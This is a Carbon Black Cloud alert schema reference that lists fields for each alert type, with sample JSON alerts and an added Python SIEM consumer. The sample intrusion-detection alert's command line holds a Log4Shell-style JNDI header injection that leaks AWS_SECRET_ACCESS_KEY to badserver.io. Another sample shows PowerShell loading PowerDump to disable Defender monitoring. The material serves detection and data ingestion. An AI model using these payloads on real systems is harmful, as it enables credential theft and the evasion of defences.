Alert Schema 2.0.0
Introduction
The following tables list the fields that can be included in an alert record for each alert type generated by the Carbon Black Cloud.
This Data Forwarder schema (v2.0.0) is aligned with the Alerts v7 API schema.
Fields in the Base Alert section are included with most alert types; the exceptions are annotated in each field's definition.
The alert types emitted by the Data Forwarder depend on the features enabled in your Carbon Black Cloud organization. Possible alert types are:
- CB_ANALYTICS - created from the Endpoint Standard NGAV offering.
- CONTAINER_RUNTIME - created from the Container Security offering.
- DEVICE_CONTROL - created when an endpoint attempts to access a blocked USB device.
- HOST_BASED_FIREWALL - created from network detections in the Endpoint Standard Host-Based Firewall add-on.
- INTRUSION_DETECTION_SYSTEM - created by the XDR extension to Enterprise EDR.
- WATCHLIST - created from alert enabled watchlists in Enterprise EDR.
Data Types
Find more detail on the data types here.
Base Alert
These fields are included with most alert types; where a field is not populated for an alert type, the definition says so.
Note: Certain fields that were previously included in this listing, but were never actually populated, have been removed.

Field Name | Definition | Datatype |
---|---|---|
alert_notes_present | True if notes are present on the alert ID; false if no notes are present. | Boolean |
alert_url | Link to the Alerts page for this alert. Does not vary by alert type. | String |
backend_timestamp | Timestamp when the Carbon Black Cloud processed the alert and enabled it for searching. Corresponds to the Created column on the Alerts page. | ISO 8601 UTC Date String |
backend_update_timestamp | Timestamp when the Carbon Black Cloud initiated and processed an update to the alert. Corresponds to the Updated column on the Alerts page. Changes made by users do not change this value; those are reflected in user_update_timestamp. | ISO 8601 UTC Date String |
blocked_effective_reputation | Effective reputation of the blocked file or process, applied by the sensor at the time the block occurred. Not available on Container Runtime or Device Control alerts. Possible values: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | String |
blocked_md5 | MD5 hash of the child process binary, for any process terminated by the sensor. Not available on Container Runtime or Device Control alerts. | String |
blocked_name | Tokenized file path of the file blocked by the sensor action. Not available on Container Runtime or Device Control alerts. | String |
blocked_sha256 | SHA-256 hash of the child process binary, for any process terminated by the sensor. Not available on Container Runtime or Device Control alerts. | String |
childproc_cmdline | Command line of the child process. Not available on Container Runtime or Device Control alerts. | String |
childproc_effective_reputation | Effective reputation of the child process, applied by the sensor at the time the event occurred. Not available on Container Runtime or Device Control alerts. Possible values: the reputation values listed under blocked_effective_reputation. | String |
childproc_guid | Unique process identifier assigned to the child process. Not available on Container Runtime or Device Control alerts. | String |
childproc_md5 | MD5 hash of the child process binary (Enterprise EDR). Not available on Container Runtime or Device Control alerts. | String |
childproc_name | Filesystem path of the child process binary. Not available on Container Runtime or Device Control alerts. | String |
childproc_sha256 | SHA-256 hash of the child process binary (Endpoint Standard). Not available on Container Runtime or Device Control alerts. | String |
childproc_username | User context in which the child process was executed. Not available on Container Runtime or Device Control alerts. | String |
detection_timestamp | Timestamp when the alert was first detected. For sensor-sent alerts this is the time of the event on the sensor; for alerts generated on the backend it is the time the backend system triggered the alert. | ISO 8601 UTC Date String |
determination | User-updatable determination of the alert, as a JSON object; the CB Analytics and Watchlist examples below show its value and change_timestamp elements. | Object |
device_external_ip | IP address of the endpoint as seen by the Carbon Black Cloud; can differ from device_internal_ip because of a network proxy or NAT. Either IPv4 (dotted decimal notation) or IPv6 (proprietary format). Not available on Container Runtime alerts. | String |
device_id | ID of the device. Not available on Container Runtime alerts. | Integer |
device_internal_ip | IP address of the endpoint as reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format). Not available on Container Runtime alerts. | String |
device_location | Whether the device was on or off premises when the alert started, based on the current IP address and the device's registered DNS domain suffix. Not available on Container Runtime alerts. Possible values: ONSITE, OFFSITE, UNKNOWN | String |
device_name | Name of the device. Not available on Container Runtime alerts. | String |
device_os | Operating system of the device. Not available on Container Runtime alerts. Possible values: WINDOWS, MAC, LINUX, OTHER | String |
device_os_version | Operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later. Not available on Container Runtime alerts. | String |
device_policy | Name of the policy applied to the device. Not available on Container Runtime alerts. | String |
device_policy_id | ID of the policy applied to the device. Not available on Container Runtime alerts. | Integer |
device_target_value | Target value assigned to the device, set from the policy. Not available on Container Runtime alerts. Possible values: LOW, MEDIUM, HIGH, MISSION_CRITICAL | String |
device_uem_id | Device correlation ID for Workspace ONE (WS1/EUC); required for the Workspace ONE Intelligence integration to function. Not available on Container Runtime alerts. | String |
device_username | Username associated with the device (the logged-in user or device owner). Not available on Container Runtime alerts. | String |
first_event_timestamp | Timestamp when the first event in the alert occurred. | ISO 8601 UTC Date String |
id | Unique ID of the alert. | String |
is_updated | True if this record is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, also generate a new copy of the alert, but with is_updated set to false. | Boolean |
last_event_timestamp | Timestamp when the last event in the alert occurred. | ISO 8601 UTC Date String |
netconn_local_ip | IP address of the local side of the network connection, stored as dotted decimal. Not available on Device Control alerts. | String |
netconn_local_ipv4 | IPv4 address of the local side of the network connection, stored as dotted decimal. Only one of the ipv4 and ipv6 fields is populated. Not available on Device Control alerts. | String |
netconn_local_ipv6 | IPv6 address of the local side of the network connection, stored as a string without the colon group separators. Only one of the ipv4 and ipv6 fields is populated. Not available on Device Control alerts. | String |
netconn_local_port | TCP or UDP port used by the local side of the network connection. Not available on Device Control alerts. | Integer |
netconn_protocol | Network protocol of the network connection. Not available on Device Control alerts. | String |
netconn_remote_domain | Domain name (FQDN) associated with the remote end of the network connection, if available. Not available on Device Control alerts. | String |
netconn_remote_ip | IP address of the remote side of the network connection, stored as dotted decimal. Not available on Device Control alerts. | String |
netconn_remote_ipv4 | IPv4 address of the remote side of the network connection, stored as dotted decimal. Only one of the ipv4 and ipv6 fields is populated. Not available on Device Control alerts. | String |
netconn_remote_ipv6 | IPv6 address of the remote side of the network connection, stored as a string without the colon group separators. Only one of the ipv4 and ipv6 fields is populated. Not available on Device Control alerts. | String |
netconn_remote_port | TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port. Not available on Device Control alerts. | Integer |
org_key | Unique alphanumeric string that identifies your organization in the Carbon Black Cloud. | String |
parent_cmdline | Command line of the parent process. Not available on Container Runtime or Device Control alerts. | String |
parent_effective_reputation | Effective reputation of the parent process, applied by the sensor when the event occurred. Not available on Container Runtime or Device Control alerts. Possible values: the reputation values listed under blocked_effective_reputation. | String |
parent_guid | Unique process identifier assigned to the parent process. Not available on Container Runtime or Device Control alerts. | String |
parent_md5 | MD5 hash of the parent process binary. Not available on Container Runtime or Device Control alerts. | String |
parent_name | Filesystem path of the parent process binary. Not available on Container Runtime or Device Control alerts. | String |
parent_pid | Identifier assigned by the operating system to the parent process. | Integer |
parent_reputation | Reputation of the parent process, applied by the Carbon Black Cloud when the event is initially processed. Not available on Container Runtime or Device Control alerts. Possible values: the reputation values listed under blocked_effective_reputation. | String |
parent_sha256 | SHA-256 hash of the parent process binary. Not available on Container Runtime or Device Control alerts. | String |
parent_username | User context in which the parent process was executed. Not available on Container Runtime or Device Control alerts. | String |
policy_applied | Whether a policy has been applied to any event associated with this alert. Possible values: APPLIED, NOT_APPLIED | String |
primary_event_id | ID of the primary event in the alert. | String |
process_cmdline | Command line executed by the actor process. Not available on Container Runtime or Device Control alerts. | String |
process_effective_reputation | Effective reputation of the actor process hash. Not available on Container Runtime or Device Control alerts. Possible values: the reputation values listed under blocked_effective_reputation. | String |
process_guid | GUID of the process that fired the alert (optional). Not available on Container Runtime or Device Control alerts. | String |
process_issuer | Certificate authority that issued the certificate used to sign the process binary. Not available on Container Runtime or Device Control alerts. | String[] |
process_md5 | MD5 hash of the actor process binary. Not available on Container Runtime or Device Control alerts. | String |
process_name | Filesystem path of the actor process binary. Not available on Container Runtime or Device Control alerts. | String |
process_pid | PID of the process that fired the alert (optional). | Integer |
process_publisher | Publisher name on the certificate used to sign the Windows or macOS process binary. Not available on Container Runtime or Device Control alerts. | String[] |
process_reputation | Reputation of the actor process, applied when the event is processed by the Carbon Black Cloud. Not available on Container Runtime or Device Control alerts. Possible values: the reputation values listed under blocked_effective_reputation. | String |
process_sha256 | SHA-256 hash of the actor process binary. Not available on Container Runtime or Device Control alerts. | String |
process_username | User context in which the actor process was executed. macOS: all users for the PID across fork() and exec() transitions. Linux: the process user for exec() events; a future sensor release can make this multi-valued because of setuid(). Not available on Container Runtime or Device Control alerts. | String |
reason | Natural-language explanation of what happened, why the alert was raised and any action taken; usually one to three sentences. | String |
reason_code | Unique short-hand code or GUID identifying the particular alert reason. | String |
run_state | Whether the threat in the alert actually ran. Possible values: DID_NOT_RUN, RAN, UNKNOWN | String |
sensor_action | Action taken by the sensor according to the rules of the policy. Possible values: ALLOW, DENY, TERMINATE | String |
severity | Integer representation of the impact of the alert if it is a true positive. | Integer |
threat_id | ID assigned to a group of alerts with common criteria, based on alert type. | String |
type | Type of alert generated. Possible values: CB_ANALYTICS, WATCHLIST, DEVICE_CONTROL, CONTAINER_RUNTIME, HOST_BASED_FIREWALL, INTRUSION_DETECTION_SYSTEM, NETWORK_TRAFFIC_ANALYSIS. NETWORK_TRAFFIC_ANALYSIS is part of the enumeration but has no field listing on this page, so consumers should not reject records whose type is not listed here. | String |
user_update_timestamp | Timestamp of the last change to an alert property made by a user, such as the workflow or determination. | ISO 8601 UTC Date String |
version | Version of the schema being emitted, e.g. 2.0.0. | String |
watchlists | List of watchlists triggered by this alert, as JSON objects each containing id and name elements that identify a watchlist. | Object[] |
workflow | Current workflow state of the alert, as a JSON object. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route. | Object |
Example
```json
{
  "version": "2.0.0",
  "org_key": "ABCD1234",
  "alert_url": "https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c",
  "id": "ca316d99-a808-3779-8aab-62b2b6d9541c",
  "type": "INTRUSION_DETECTION_SYSTEM",
  "is_updated": false,
  "detection_timestamp": "2023-02-03T17:22:03.945Z",
  "first_event_timestamp": "2023-02-03T17:22:03.945Z",
  "last_event_timestamp": "2023-02-03T17:22:03.945Z",
  "severity": 1,
  "reason": "HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 142.250.189.174 from 10.203.105.21",
  "threat_id": "bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
  "primary_event_id": "21AB6B27-9F72-11ED-A79A-005056A53F17",
  "workflow": {
    "status": "OPEN",
    "change_timestamp": "2023-02-03T17:27:33.007Z",
    "changed_by_type": "SYSTEM",
    "changed_by": "ALERT_CREATION",
    "closure_reason": "NO_REASON"
  },
  "alert_notes_present": false,
  "policy_applied": "NOT_APPLIED",
  "run_state": "RAN",
  "rule_category_id": "DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
  "rule_id": "B5974D4D-265E-4FAF-8F71-2F76AAD67857",
  "reason_code": "DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
  "sensor_action": "ALLOW",
  "device_target_value": "MEDIUM",
  "device_policy_id": 165700,
  "device_policy": "Standard",
  "device_id": 17482451,
  "device_name": "DEV01-39X-1",
  "device_os": "WINDOWS",
  "device_os_version": "Windows 10 x64",
  "device_username": "DemoMachine",
  "device_location": "UNKNOWN",
  "device_external_ip": "66.170.99.2",
  "device_internal_ip": "10.203.105.21",
  "netconn_remote_port": 80,
  "netconn_local_port": 49233,
  "netconn_remote_domain": "google.com",
  "netconn_remote_ip": "142.250.189.174",
  "netconn_local_ip": "10.203.105.21",
  "netconn_remote_ipv4": "142.250.189.174",
  "netconn_local_ipv4": "10.203.105.21",
  "attack_tactic": "TA0001",
  "attack_technique": "T1190",
  "tms_rule_id": "4b98443a-ba0d-4ff5-b99e-e5e70432a214",
  "threat_name": "CVE-2021-44228 Exploit",
  "process_guid": "ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
  "process_pid": 5780,
  "process_name": "c:\\windows\\system32\\curl.exe",
  "process_sha256": "d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
  "process_md5": "eac53ddafb5cc9e780a7cc086ce7b2b1",
  "process_reputation": "TRUSTED_WHITE_LIST",
  "process_effective_reputation": "TRUSTED_WHITE_LIST",
  "process_cmdline": "curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
  "process_username": "DEV01-39X-1\\bit9qa",
  "process_issuer": ["Microsoft Windows Production PCA 2011"],
  "process_publisher": ["Microsoft Windows"],
  "parent_guid": "ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
  "parent_pid": 8796,
  "parent_name": "c:\\windows\\system32\\cmd.exe",
  "parent_sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
  "parent_md5": "8a2122e8162dbef04694b9c3e0b6cdee",
  "parent_reputation": "TRUSTED_WHITE_LIST",
  "parent_effective_reputation": "TRUSTED_WHITE_LIST",
  "parent_cmdline": "\"C:\\WINDOWS\\system32\\cmd.exe\" ",
  "parent_username": "DEV01-39X-1\\bit9qa",
  "mdr_alert_notes_present": false,
  "mdr_alert": false
}
```
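As an added example that is not part of this schema page or of Carbon Black's own tooling, the following Python consumer shows what a SIEM ingestion job has to get right with records in this schema: checking the fields the Base Alert table lists on every record, tolerating type values the enumeration may grow (NETWORK_TRAFFIC_ANALYSIS already appears in the type field with no table on this page), restoring the colon-less netconn_*_ipv6 form, and collapsing the several copies the forwarder emits for one alert id (backend updates with is_updated true, user workflow changes with is_updated false) to the newest state. The NDJSON records, the REQUIRED and EXTRA_FIELDS lists and the flattened event layout are this example's assumptions, not part of the schema.

```python
"""Consumer for Carbon Black Cloud Data Forwarder alert records, schema 2.0.0.

Added example; not code from the schema page or from Carbon Black. It checks
the base fields, dispatches on `type` without dropping unknown values, restores
netconn_*_ipv6 (stored without colons) and keeps only the newest copy of each
alert id. The NDJSON records at the bottom are constructed for this example.
"""
import ipaddress
import json
from datetime import datetime

SCHEMA_VERSION = "2.0.0"
REQUIRED = ("version", "org_key", "id", "type", "severity", "reason", "threat_id",
            "detection_timestamp", "first_event_timestamp", "last_event_timestamp",
            "workflow")
KNOWN_TYPES = {"CB_ANALYTICS", "WATCHLIST", "DEVICE_CONTROL", "CONTAINER_RUNTIME",
               "HOST_BASED_FIREWALL", "INTRUSION_DETECTION_SYSTEM",
               "NETWORK_TRAFFIC_ANALYSIS"}
# Type-specific fields worth lifting into the SIEM event (assumed selection).
EXTRA_FIELDS = {
    "CB_ANALYTICS": ("ttps", "attack_tactic", "attack_technique", "rule_id"),
    "WATCHLIST": ("report_name", "ioc_id", "ioc_hit", "watchlists",
                  "ml_classification_final_verdict"),
    "CONTAINER_RUNTIME": ("k8s_cluster", "k8s_namespace", "k8s_workload_name",
                          "connection_type", "ip_reputation", "remote_is_private"),
    "DEVICE_CONTROL": ("vendor_id", "product_id", "serial_number"),
    "HOST_BASED_FIREWALL": ("rule_id", "rule_category_id"),
    "INTRUSION_DETECTION_SYSTEM": ("threat_name", "tms_rule_id", "attack_technique"),
}


def parse_ts(value):
    """ISO 8601 UTC string with a trailing Z -> timezone-aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def expand_ipv6(compact):
    """netconn_*_ipv6 is 32 hex digits with no colons; return the canonical form."""
    if len(compact) != 32 or not all(c in "0123456789abcdefABCDEF" for c in compact):
        raise ValueError(f"not a colon-less IPv6 string: {compact!r}")
    return str(ipaddress.IPv6Address(":".join(compact[i:i + 4] for i in range(0, 32, 4))))


def remote_ip(alert):
    """Only one of the ipv4/ipv6 fields is populated; return whichever is set."""
    if alert.get("netconn_remote_ipv4"):
        return alert["netconn_remote_ipv4"]
    if alert.get("netconn_remote_ipv6"):
        return expand_ipv6(alert["netconn_remote_ipv6"])
    return None


def state_timestamp(alert):
    """Timestamp that orders the copies of one alert id; the newest copy wins."""
    candidates = (alert.get("backend_update_timestamp"), alert.get("user_update_timestamp"),
                  alert.get("backend_timestamp"), alert["detection_timestamp"])
    return max(parse_ts(t) for t in candidates if t)


def normalize(alert):
    """Validate the base fields and flatten one record into a SIEM event."""
    missing = [f for f in REQUIRED if f not in alert]
    if missing:
        raise ValueError(f"alert {alert.get('id')!r} missing base fields: {missing}")
    if alert["version"] != SCHEMA_VERSION:
        raise ValueError(f"unexpected schema version {alert['version']!r}")
    event = {
        "alert_id": alert["id"],
        "type": alert["type"],
        "type_known": alert["type"] in KNOWN_TYPES,  # keep the record, flag for review
        "severity": int(alert["severity"]),
        "detected_at": parse_ts(alert["detection_timestamp"]),
        "state_at": state_timestamp(alert),
        "is_backend_update": bool(alert.get("is_updated", False)),
        "workflow_status": alert["workflow"]["status"],
        "remote_ip": remote_ip(alert),
        "process_sha256": alert.get("process_sha256"),
    }
    for field in EXTRA_FIELDS.get(alert["type"], ()):
        if field in alert:
            event[field] = alert[field]
    return event


def latest_per_alert(ndjson_lines):
    """Collapse re-emitted copies of an alert to its newest state."""
    newest = {}
    for line in ndjson_lines:
        if not line.strip():
            continue
        event = normalize(json.loads(line))
        current = newest.get(event["alert_id"])
        if current is None or event["state_at"] > current["state_at"]:
            newest[event["alert_id"]] = event
    return newest


# Constructed sample: one alert emitted twice (creation, then a backend update that
# moved it to IN_PROGRESS) and an IDS alert with an IPv6 remote address.
SAMPLE_NDJSON = """
{"version":"2.0.0","org_key":"ABCD1234","id":"a1","type":"CB_ANALYTICS","severity":5,"reason":"A known virus was detected running.","threat_id":"t1","detection_timestamp":"2023-07-17T17:15:51.708Z","backend_timestamp":"2023-07-17T17:16:50.960Z","first_event_timestamp":"2023-07-17T17:15:33.396Z","last_event_timestamp":"2023-07-17T17:15:33.396Z","is_updated":false,"workflow":{"status":"OPEN"},"ttps":["FILELESS","MALWARE_APP"]}
{"version":"2.0.0","org_key":"ABCD1234","id":"a1","type":"CB_ANALYTICS","severity":5,"reason":"A known virus was detected running.","threat_id":"t1","detection_timestamp":"2023-07-17T17:15:51.708Z","backend_timestamp":"2023-07-17T17:16:50.960Z","backend_update_timestamp":"2023-07-17T17:18:03.397Z","first_event_timestamp":"2023-07-17T17:15:33.396Z","last_event_timestamp":"2023-07-17T17:15:33.396Z","is_updated":true,"workflow":{"status":"IN_PROGRESS"},"ttps":["FILELESS","MALWARE_APP"]}
{"version":"2.0.0","org_key":"ABCD1234","id":"b2","type":"INTRUSION_DETECTION_SYSTEM","severity":1,"reason":"HTTP traffic matched an IDS signature.","threat_id":"t2","detection_timestamp":"2023-02-03T17:22:03.945Z","first_event_timestamp":"2023-02-03T17:22:03.945Z","last_event_timestamp":"2023-02-03T17:22:03.945Z","is_updated":false,"workflow":{"status":"OPEN"},"netconn_remote_ipv6":"20010db8000000000000000000000001","netconn_remote_port":80,"threat_name":"CVE-2021-44228 Exploit"}
"""
```

Run `latest_per_alert(SAMPLE_NDJSON.splitlines())` to get one event per alert id; the first alert comes back in its IN_PROGRESS state and the IDS alert's remote address is reported as `2001:db8::1`. Ordering by the newest of backend_update_timestamp, user_update_timestamp and backend_timestamp, rather than by arrival order, is what keeps a late-delivered forwarder batch from reverting an alert that an analyst has already moved on.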
CB Analytics Alerts
CB Analytics alerts are created from the Endpoint Standard NGAV offering. They contain the fields in this section in addition to those listed in Base Alert.
Field Name | Definition | Datatype |
---|---|---|
attack_tactic | A tactic from the MITRE ATT&CK framework; defines the reason for an adversary's action, such as achieving credential access. | String |
attack_technique | A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access. | String |
rule_category_id | ID representing the category of the rule_id for certain alert types. | String |
rule_id | ID of the rule that triggered the alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence and USB Device Control alerts. | String |
ttps | Other potential malicious activities involved in the threat. | String[] |
Example
```json
{
  "version": "2.0.0",
  "org_key": "ABCD1234",
  "alert_url": "https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
  "id": "411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
  "type": "CB_ANALYTICS",
  "is_updated": true,
  "detection_timestamp": "2023-07-17T17:15:51.708Z",
  "backend_timestamp": "2023-07-17T17:16:50.960Z",
  "backend_update_timestamp": "2023-07-17T17:18:03.397Z",
  "first_event_timestamp": "2023-07-17T17:15:33.396Z",
  "last_event_timestamp": "2023-07-17T17:15:33.396Z",
  "severity": 5,
  "reason": "A known virus (HackTool: Powerpuff) was detected running.",
  "threat_id": "9e0afc389c1acc43b382b1ba590498d2",
  "primary_event_id": "94953e4524c511ee86284f0541a5184d",
  "workflow": {
    "status": "OPEN",
    "change_timestamp": "2023-07-17T17:16:50.960Z",
    "changed_by_type": "SYSTEM",
    "changed_by": "ALERT_CREATION",
    "closure_reason": "NO_REASON"
  },
  "determination": {
    "value": "NONE",
    "change_timestamp": "2023-07-17T17:16:50.960Z"
  },
  "alert_notes_present": false,
  "policy_applied": "NOT_APPLIED",
  "run_state": "RAN",
  "reason_code": "T_REP_VIRUS",
  "sensor_action": "ALLOW",
  "device_target_value": "MISSION_CRITICAL",
  "device_policy_id": 112221,
  "device_policy": "SSQ_Policy",
  "device_id": 6948863,
  "device_name": "Kognos-W19-CB-3",
  "device_os": "WINDOWS",
  "device_os_version": "Windows Server 2019 x64",
  "device_username": "demouser@demo.org",
  "device_location": "OFFSITE",
  "device_external_ip": "34.234.170.45",
  "device_internal_ip": "10.0.14.120",
  "ttps": [
    "FILELESS",
    "MALWARE_APP",
    "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
    "MITRE_T1059_001_POWERSHELL",
    "RUN_MALWARE_APP"
  ],
  "attack_tactic": "TA0002",
  "process_guid": "ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
  "process_pid": 3600,
  "process_name": "c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
  "process_sha256": "3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
  "process_md5": "42a80cc2333b612b63a859f17474c9af",
  "process_reputation": "KNOWN_MALWARE",
  "process_effective_reputation": "KNOWN_MALWARE",
  "process_cmdline": "\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
  "process_username": "KOGNOS-W19-CB-3\\Administrator",
  "parent_guid": "ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
  "parent_pid": 4024,
  "parent_name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
  "parent_sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
  "parent_reputation": "TRUSTED_WHITE_LIST",
  "parent_effective_reputation": "TRUSTED_WHITE_LIST",
  "parent_username": "KOGNOS-W19-CB-3\\Administrator",
  "childproc_guid": "ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
  "childproc_effective_reputation": "RESOLVING",
  "childproc_username": "KOGNOS-W19-CB-3\\Administrator",
  "blocked_effective_reputation": "RESOLVING",
  "mdr_alert_notes_present": false,
  "mdr_alert": false
}
```
Container Runtime Alerts
Container Runtime alerts are created from the Container Security offering. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
connection_type | Connection type. Possible values: INTERNAL_INBOUND, INTERNAL_OUTBOUND, INGRESS, EGRESS | String |
egress_group_id | Unique identifier of the egress group. | String |
egress_group_name | Name of the egress group. | String |
ip_reputation | Reputation score of the remote IP address, a single integer from 0 to 100: 0 unknown, 1-20 high risk, 21-40 suspicious, 41-60 moderate, 61-80 low risk, 81-100 trustworthy. The example below shows 96, a trustworthy destination. | Integer |
k8s_cluster | Kubernetes cluster name. | String |
k8s_kind | Kubernetes workload kind. | String |
k8s_namespace | Kubernetes namespace. | String |
k8s_pod_name | Name of the pod within the workload. | String |
k8s_policy | Name of the Kubernetes policy. | String |
k8s_policy_id | Unique identifier of the Kubernetes policy. | String |
k8s_rule | Name of the Kubernetes policy rule. | String |
k8s_rule_id | Unique identifier of the Kubernetes policy rule. | String |
k8s_workload_name | Kubernetes workload name. | String |
remote_is_private | True if the remote address is a private address; false if it is public. | Boolean |
remote_k8s_kind | Kind of the remote workload; set if the remote side is another workload in the same cluster. | String |
remote_k8s_namespace | Namespace within the remote workload's cluster; set if the remote side is another workload in the same cluster. | String |
remote_k8s_pod_name | Pod name of the remote workload; set if the remote side is another workload in the same cluster. | String |
remote_k8s_workload_name | Name of the remote workload; set if the remote side is another workload in the same cluster. | String |
Example
```json
{
  "version": "2.0.0",
  "org_key": "ABCD1234",
  "alert_url": "https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f",
  "id": "f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
  "type": "CONTAINER_RUNTIME",
  "is_updated": false,
  "detection_timestamp": "2023-02-06T00:10:51.176Z",
  "first_event_timestamp": "2023-02-06T00:09:19.320Z",
  "last_event_timestamp": "2023-02-06T00:09:19.320Z",
  "severity": 5,
  "reason": "Detected a connection to a public destination that isn't allowed for this scope",
  "threat_id": "0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
  "primary_event_id": "X0z55sxeTGWPfKuzPkFlCg-61",
  "workflow": {
    "status": "OPEN",
    "change_timestamp": "2023-02-06T00:13:37.663Z",
    "changed_by_type": "SYSTEM",
    "changed_by": "ALERT_CREATION",
    "closure_reason": "NO_REASON"
  },
  "alert_notes_present": false,
  "policy_applied": "NOT_APPLIED",
  "run_state": "RAN",
  "reason_code": "2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
  "sensor_action": "ALLOW",
  "device_target_value": "MEDIUM",
  "device_os": "WINDOWS",
  "device_location": "UNKNOWN",
  "k8s_policy_id": "ef4ccd0b-df14-4f5d-8454-480c5193a0b7",
  "k8s_policy": "Big runtime policy",
  "k8s_rule_id": "11111111-1111-1111-1111-111111111111",
  "k8s_rule": "Allowed public destinations",
  "k8s_cluster": "tomer:sensor-aks",
  "k8s_namespace": "kube-system",
  "k8s_kind": "DaemonSet",
  "k8s_workload_name": "ama-logs",
  "k8s_pod_name": "ama-logs-gm5tt",
  "connection_type": "EGRESS",
  "ip_reputation": 96,
  "netconn_remote_port": 443,
  "netconn_local_port": 56618,
  "netconn_protocol": "TCP",
  "netconn_remote_domain": "westeurope.monitoring.azure.com",
  "netconn_remote_ip": "20.50.65.82",
  "netconn_local_ip": "10.244.2.22",
  "netconn_remote_ipv4": "20.50.65.82",
  "netconn_local_ipv4": "10.244.2.22",
  "remote_is_private": false,
  "process_guid": "ABCD1234-00000000-00200e62-00000000-1d92c1262642b33",
  "process_pid": 2100834,
  "process_name": "KUBERNETES_RUNTIME_NODE_AGENT",
  "process_sha256": "506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5",
  "process_md5": "4cbdc5f51d0397b26886191b799131d5",
  "process_reputation": "NOT_LISTED",
  "process_effective_reputation": "RESOLVING",
  "mdr_alert_notes_present": false,
  "mdr_alert": false
}
```
Device Control Alerts
Device Control alerts are created when an endpoint attempts to access a blocked USB device. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
external_device_friendly_name | Human-readable name of the external device. | String |
product_id | Product ID that identifies the USB device. | String |
product_name | Product name that identifies the USB device. | String |
serial_number | Serial number of the specific device. | String |
vendor_id | ID of the vendor that produced the device. | String |
vendor_name | Name of the vendor that produced the device. | String |
Host Based Firewall Alerts
Host-Based Firewall alerts are created from network detections in the Endpoint Standard Host-Based Firewall add-on. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
rule_category_id | ID representing the category of the rule_id for certain alert types. | String |
rule_id | ID of the rule that triggered the alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence and USB Device Control alerts. | String |
Intrusion Detection Alerts
Intrusion Detection System alerts are created by the XDR extension to Enterprise EDR. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
attack_tactic | A tactic from the MITRE ATT&CK framework; defines the reason for an adversary's action, such as achieving credential access. | String |
attack_technique | A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access. | String |
rule_category_id | ID representing the category of the rule_id for certain alert types. | String |
threat_name | Name of the threat. | String |
tms_rule_id | Detection ID. | String |
ttps | Other potential malicious activities involved in the threat. | String[] |
Watchlist Alerts
Watchlist alerts are created from alert enabled watchlists in Enterprise EDR. They contain the fields in this section in addition to those listed in Base Alert section.
Field Name | Definition | Datatype |
---|---|---|
attack_tactic | A tactic from the MITRE ATT&CK framework; defines the reason for an adversary's action, such as achieving credential access. | String |
attack_technique | A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access. | String |
